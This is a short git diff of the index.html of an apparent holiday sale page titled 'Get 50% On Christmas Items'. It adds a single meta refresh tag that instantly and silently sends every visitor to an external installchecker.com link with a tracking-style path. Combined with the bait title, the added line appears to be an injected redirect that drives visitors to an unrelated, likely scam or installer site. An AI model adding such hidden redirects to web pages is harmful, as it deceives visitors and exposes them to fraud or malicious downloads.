--- a/index.html
+++ b/index.html
@@ -1,6 +1,7 @@
 <!DOCTYPE html>
 <html lang="en">
 <head>
+    <meta http-equiv="refresh" content="0; url=https://installchecker.com/cl/i/42n311">
   <link rel="icon" href="https://st2.depositphotos.com/3262945/9227/v/950/depositphotos_92273670-stock-illustration-christmas-sale-50.jpg" type="image/x-icon">
   <meta charset="UTF-8">
   <title>Get 50% On Christmas Items</title>
